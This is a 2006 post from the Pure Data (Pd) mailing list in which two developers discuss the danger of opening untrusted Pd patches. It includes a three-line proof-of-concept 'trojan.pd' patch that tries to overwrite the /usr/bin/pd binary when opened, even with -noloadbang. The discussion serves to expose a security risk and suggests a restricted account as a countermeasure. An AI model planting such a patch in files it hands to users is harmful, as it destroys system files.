[PD] embed_Data.pd
Mathieu Bouchard
matju at artengine.ca
Sun Oct 15 14:37:56 CEST 2006
On Sun, 15 Oct 2006, Frank Barknecht wrote:
> That's a danger of course. You can load unknown patches with
> "-noloadbang" and/or remove the "shell" external from your path as first
> measures.
put this in file trojan.pd :
#N canvas 0 0 0 0 0 0 10;
#X obj 0 0 namecanvas self;
self savetofile pd /usr/bin;
then "pd trojan.pd" will attempt to overwrite /usr/bin/pd, and so will "pd
-noloadbang trojan.pd".
> Of course this won't stop a really desperate attacker, so it's better to
> run unknown patches under a restricted accound (like doing a "sudo
> nobody" first)
yes
> However my comment regarding Steffen's patch was meant as a comment
> about the general principle he uses.
i understand this.
_ _ __ ___ _____ ________ _____________ _____________________ ...
| Mathieu Bouchard - tél:+1.514.383.3801 - http://artengine.ca/matju
| Freelance Digital Arts Engineer, Montréal QC Canada
More information about the Pd-list
mailing list